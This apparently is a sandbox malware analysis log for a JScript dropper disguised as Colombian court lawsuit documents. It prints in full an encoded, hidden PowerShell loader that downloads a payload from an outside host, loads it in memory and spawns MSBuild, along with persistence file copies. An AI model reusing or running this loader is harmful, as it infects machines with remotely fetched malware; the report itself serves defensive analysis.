AHQAaAA7ACQAQgB1AHgAdQBzACAAPQAgACQAcABsAGUAbwBtAGEAegBpAGEAIAAtACAAJABvAHYAZQByAGYAbABpAGcAaAB0AHMAOwAkAGIAbABpAG4AZwB5ACAAPQAgACQAYwBhAHIAcABlAHQAYgBhAGcAZwBpAG4AZwAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABvAHYAZQByAGYAbABpAGcAaAB0AHMALAAgACQAQgB1AHgAdQBzACkAOwAkAFQAaQB0AGEAbgBpAGEAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAGwAaQBuAGcAeQApADsAJABtAGUAbAB0AGkAZQByACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAAkAFQAaQB0AGEAbgBpAGEAbgApADsAJAByAG8AcwB0AHIAYQB0AHUAbABhACAAPQAgAFsAZABuAGwAaQBiAC4ASQBPAC4ASABvAG0AZQBdAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFYAQQBJACcAKQAuAEkAbgB2AG8AawB
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.js "C:\Users\Public\Downloads\fluctuous.js"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c "$embolic = 'JABjAGgAbwBuAGQAcgBvAHMAdABvAG0AYQAgAD0AIAAnACYAZQA1ADUAMQA0ADUAMQA1AGQAOQA3ADUAOABlAGEAZgBhAGIAMQAwADIANgAzAGQAYwA1ADYAOAA1ADcAZgAxADcAZQA4ADgAMgAwAGQAOQA0ADAAMQBkAGYAYQA2ADMAOQA5ADQANQA2AGUANAA1AGUAMgBjADIANAAwAGIAZAA9AG0AaAAmADEAZgAxADAAYgAwADgANgA9AHMAaQAmADEANwAzADUAYwAwADgANgA9AHgAZQA/ACMAeAAjAC4AZQBsAGkARgBkAGUAIwByAGUAdgBuAG8AQwAvADMAOAA2ADUAMwAyADIAMwAyADcAOAA5ADYAOAA5ADQANgAzADEALwA1ADUAMgAxADcANQAwADUAMQA2ADkANQA2ADEAMQA0ADUAMwAxAC8AcwAjAG4AZQBtAGgAYwBhACMAIwBhAC8AbQBvAGMALgBwAHAAYQBkAHIAbwBjAHMAaQBkAC4AbgBkAGMALwAvADoAcwBwACMAIwBoACcAOwAkAHAAcgBlAHMAYwByAGkAYgBpAG4AZwAgAD0AIAAkAGMAaABvAG4AZAByAG8AcwB0AG8AbQBhACAALQByAGUAcABsAGEAYwBlACAAJwAjACcALAAgACcAdAAnADsAJABwAHkAcgBvAGcAbgBvAHMAdABpAGMAcwAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBhAHIAYwBoAGkAdgBlAC4AbwByAGcALwBkAG8AdwBuAGwAbwBhAGQALwBuAGUAdwBfAGkAbQBhAGcAZQBfADIAMAAyADUAMAA0ADEAMwAvAG4AZQB3AF8AaQBtAGEAZwBlAC4AagBwAGcAJwA7ACQAbQBlAHIAYwBoAGEAbgB0AGUAcgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABtAGUAcgBjAGgAYQBuAHQAZQByAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAnACkAOwAkAGgAYQBsAHQAZQByAGkAYQAgAD0AIAAkAG0AZQByAGMAaABhAG4AdABlAHIALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAcAB5AHIAbwBnAG4AbwBzAHQAaQBjAHMAKQA7ACQAYwBhAHIAcABlAHQAYgBhAGcAZwBpAG4AZwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGgAYQBsAHQAZQByAGkAYQApADsAJAByAGgAYQBiAGQAbwBtAGEAbgB0AGkAcwB0ACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8AUwBUAEEAUgBUAD4APgAnADsAJABmAHIAdQBpAHQAZQByAGUAcgBzACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8ARQBOAEQAPgA+ACcAOwAkAG8AdgBlAHIAZgBsAGkAZwBoAHQAcwAgAD0AIAAkAGMAYQByAHAAZQB0AGIAYQBnAGcAaQBuAGcALgBJAG4AZABlAHgATwBmACgAJAByAGgAYQBiAGQAbwBtAGEAbgB0AGkAcwB0ACkAOwAkAHAAbABlAG8AbQBhAHoAaQBhACAAPQAgACQAYwBhAHIAcABlAHQAYgBhAGcAZwBpAG4AZwAuAEkAbgBkAGUAeABPAGYAKAAkAGYAcgB1AGkAdABlAHIAZQByAHMAKQA7ACQAbwB2AGUAcgBmAGwAaQBnAGgAdABzACAALQBnAGUAIAAwACAALQBhAG4AZAAgACQAcABsAGUAbwBtAGEAegBpAGEAIAAtAGcAdAAgACQAbwB2AGUAcgBmAGwAaQBnAGgAdABzADsAJABvAHYAZQByAGYAbABpAGcAaAB0AHMAIAArAD0AIAAkAHIAaABhAGIAZABvAG0AYQBuAHQAaQBzAHQALgBMAGUAbgBnAHQAaAA7ACQAQgB1AHgAdQBzACAAPQAgACQAcABsAGUAbwBtAGEAegBpAGEAIAAtACAAJABvAHYAZQByAGYAbABpAGcAaAB0AHMAOwAkAGIAbABpAG4AZwB5ACAAPQAgACQAYwBhAHIAcABlAHQAYgBhAGcAZwBpAG4AZwAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABvAHYAZQByAGYAbABpAGcAaAB0AHMALAAgACQAQgB1AHgAdQBzACkAOwAkAFQAaQB0AGEAbgBpAGEAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAGwAaQBuAGcAeQApADsAJABtAGUAbAB0AGkAZQByACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAAkAFQAaQB0AGEAbgBpAGEAbgApADsAJAByAG8AcwB0AHIAYQB0AHUAbABhACAAPQAgAFsAZABuAGwAaQBiAC4ASQBPAC4ASABvAG0AZQBdAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFYAQQBJACcAKQAuAEkAbgB2AG8AawBJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.js "C:\Users\Public\Downloads\fluctuous.js"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: Documentos_de_la_demanda_penal_en_su_contra_juzgado_03_de_bogota_6ciu345n (7).jsStatic file information: File size 1477831 > 1048576
              Source: Binary string: dnlib.DotNet.Pdb.PdbWriter+ source: powershell.exe, 00000002.00000002.1352353205.0000013DAC470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1313016368.0000013DA4D4C000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.dotnet.mdrawmethodimplrowdnlib.dotnet.pdbpdbimpltype source: powershell.exe, 00000002.00000002.1359529305.00007FFC3DCE4000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: `2microsoft.win32.taskschedulercalendartriggermicrosoft.win32.taskschedulertaskprincipalprivilegemicrosoft.win32.taskschedulertasksnapshotvirtualmachinedetectordnlib.dotnet.pdbsymbolreadercreatordnlib.dotnet.emitinstructionprinterdnlib.dotnettypeequalitycomparerdnlib.dotnet.mdimagecor20headerdnlib.dotnet.mdirawrowdnlib.dotnet.writermethodbodywritermicrosoft.win32.taskschedulertaskregistrationinfomicrosoft.win32.taskschedulershowmessageactiondnlib.dotnetihasdeclsecuritycomhandlerupdatemicrosoft.win32.taskschedulereventtriggerdnlib.dotnetimanagedentrypointstartup_informationmicrosoft.win32.taskscheduler.fluentmonthlydowtriggerbuildermicrosoft.win32.taskschedulertaskauditrulednlib.dotnet.writerstrongnamesignaturednlib.dotnetitypednlib.dotnetsentinelsigdnlib.dotnet.mdicolumnreaderdnlib.dotnet.writermodulewritereventdnlib.dotnettypenameparserdnlib.dotneticustomattributednlib.dotnet.pdb.dsssymbolwritercreatordnlib.dotnet.resourcesbinaryresourcedatadnlib.dotnet.mdrawtyperefrowdnlib.ioimagestreamcreatorconnectiontokendnlib.pepeextensionsdnlib.dotnet.pdbsequencepointdnlib.dotnetlinkedresourcednlib.dotnettyperefdnlib.dotnetpublickeydnlib.dotnetiassemblyreffinderdnlib.dotnet.mdrawgenericparamconstraintrowdnlib.dotnettypedefdnlib.dotnetrecursioncounterdnlib.dotnet.mdrawassemblyrefosrowdnlib.pecharacteristicsdnlib.w32resourcesresourcedirectorype source: powershell.exe, 00000002.00000002.1359529305.00007FFC3DCE4000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000002.00000002.1352353205.0000013DAC470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1313016368.0000013DA4D4C000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000002.00000002.1359529305.00007FFC3DCE4000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000002.00000002.1352353205.0000013DAC470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1313016368.0000013DA4D4C000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: `1dnlib.dotnet.emitexceptionhandlertypednlib.dotnet.pdb.managedsymbolreadercreatordnlib.dotnetmoduledefuserdnlib.dotnetgenericparamconstraintuserdnlib.dotnetparamdefdnlib.dotnet.mdrawtypedefrowdnlib.dotnet.resourcescreateresourcedatadelegatednlib.dotnetvtableflagsdnlib.dotnet.mdrawinterfaceimplrowdnlib.dotnet.writeriheapdnlib.dotnet.mdmetadataheader source: powershell.exe, 00000002.00000002.1359529305.00007FFC3DCE4000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: >.CurrentSystem.Collections.IEnumerator.CurrentSystem.Collections.Generic.IEnumerator<System.Int32>.get_CurrentSystem.Collections.Generic.IEnumerator<System.Collections.Generic.KeyValuePair<System.UInt32,System.Byte[]>>.get_CurrentSystem.Collections.Generic.IEnumerator<System.Collections.Generic.KeyValuePair<System.String,System.String>>.get_CurrentSystem.Collections.Generic.IEnumerator<T>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.CustomAttribute>.get_CurrentSystem.Collections.Generic.IEnumerator<TValue>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.FieldDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.MethodDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.TypeDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.EventDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.PropertyDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.ModuleRef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.TypeRef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.MemberRef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.AssemblyRef>.get_CurrentSystem.Collections.Generic.IEnumerator<System.String>.get_CurrentSystem.Collections.Generic.IEnumerator<TIn>.get_CurrentSystem.Collections.Generic.IEnumerator<Microsoft.Win32.TaskScheduler.TaskFolder>.get_CurrentSystem.Collections.Generic.IEnumerator<Microsoft.Win32.TaskScheduler.Trigger>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.CANamedArgument>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.MD.IRawRow>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.AssemblyResolver. source: powershell.exe, 00000002.00000002.1352353205.0000013DAC470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1313016368.0000013DA4D4C000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000002.00000002.1352353205.0000013DAC470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1313016368.0000013DA4D4C000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000002.00000002.1352353205.0000013DAC470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1313016368.0000013DA4D4C000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: `1dnlib.dotnet.writermodulewriteroptionsbasednlib.dotnet.pdb.dssisymunmanagedwriter2microsoft.win32.taskschedulernotsupportedpriortoexceptiondnlib.dotnetmodulerefuserdnlib.dotnet.mddotnetstreamdnlib.dotnet.writerusheapdnlib.dotnet.pdbimage_debug_directorydnlib.dotnet.writermdtable`1microsoft.win32.taskschedulermaintenancesettingsdnlib.dotnet.writercreatepdbsymbolwriterdelegatemicrosoft.win32.taskschedulertaskrightsdnlib.dotnet.writermodulewriterexceptiondnlib.dotnet.pdb.managedpdbreaderdnlib.dotnetparamattributesdnlib.dotnet.writerhotheapdnlib.dotnettypedeforrefsigdnlib.dotnettypenameparserexceptiondnlib.dotnetexportedtypeuserdnlib.dotnet.emitcilbodydnlib.dotnet.writersignaturewriterdnlib.dotnetmethodspecuserdnlib.dotnetvtablemicrosoft.win32.taskscheduler.fluentintervaltriggerbuildermicrosoft.win32.taskschedulernotv2supportedexceptiondnlib.dotnetcanamedargumentdnlib.dotnet.emitmethodutilsdnlib.dotnet.writerblobheapdnlib.dotnet.pdbpdbstateelemdnlib.dotnetresolveexceptiondnlib.dotnet.resourcesresourceelementsetdnlib.dotnetifielddnlib.dotnet.mdrawconstantrowdnlib.dotnet.resourcesuserresourcetypemicrosoft.win32.taskschedulerregistrationtriggerdnlib.dotneteventequalitycomparertaskprincipalprivilegesenumeratordnlib.dotnettypespecdnlib.dotnet.emitopcodesmicrosoft.win32.taskschedulernamevaluepairmicrosoft.win32.taskschedulertaskaccessrulednlib.dotnet.mdtablednlib.dotnetihassemanticmicrosoft.win32.taskschedulertaskprocesstokensidtypemicrosoft.win32.taskschedulertaskcollectiondnlib.dotnetpinnedsigdnlib.dotnetmanifestresourcednlib.dotnet.emitinvalidmethodexceptiondnlib.dotnet.mdrawmodulerefrow<>c<>c<>c<>c<>c<>c<>c<>c<>c<>cdnlib.w32resourcesresourcename<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>cdnlib.dotnet.emitinstructiondnlib.dotnet.emitflowcontroldnlib.dotnetiresolverdnlib.dotnetassemblyrefdnlib.dotnet.writerhotheap20microsoft.win32.taskschedulerweeklytriggerdnlib.dotnetptrsigdnlib.dotnet.resourcesresourcetypecodemicrosoft.win32.taskscheduler.fluentsettingsbuilderdnlib.ioloaderdnlib.dotnet.mdrawpropertymaprowdnlib.dotnet.mdirowreader`1microsoft.win32.taskschedulertasktriggertypednlib.dotnet.mdcolumninfodnlib.dotnetnonleafsigdnlib.dotnetcallingconventionsigmicrosoft.win32.taskscheduleridlesettingsdnlib.dotnet.writeruniquechunklist`1dnlib.dotnetsigcompareroptionsdnlib.dotnetassemblydefdnlib.ioifilesectiondnlib.dotnetsignaturereadermicrosoft.win32.taskschedulerlogontriggerdnlib.dotnet.mdrawimplmaprowdnlib.dotnetimemberrefdnlib.dotnet.writerbytearraychunkdnlib.dotnetarraymarshaltypednlib.pesubsystemdnlib.dotnetassemblylinkedresourcednlib.dotnetcmodoptsigdnlib.dotnet.mdmdtablednlib.dotnetlocalsigdnlib.dotnetimemberdefdnlib.dotnetfixedarraymarshaltypemicrosoft.win32.taskschedulercomhandleractiondnlib.dotnetmoduledefmd2dnlib.dotnet.emitdynamicmethodbodyreaderdnlib.dotnetclasslayoutuserdnlib.dotnetmethodsigtokentypemicrosoft.win32.taskschedulermonthlytriggerdnlib.peipeimagednlib.dotnet.mdrawfilerowdnlib.dotnet.writerhotheap40dnlib.dotnetmodifiersigdnlib.d
              Source: Binary string: dnlib.dotnet.pdb.managedpdbexception source: powershell.exe, 00000002.00000002.1359529305.00007FFC3DCE4000.00000004.00000800.00020000.00000000.sdmp
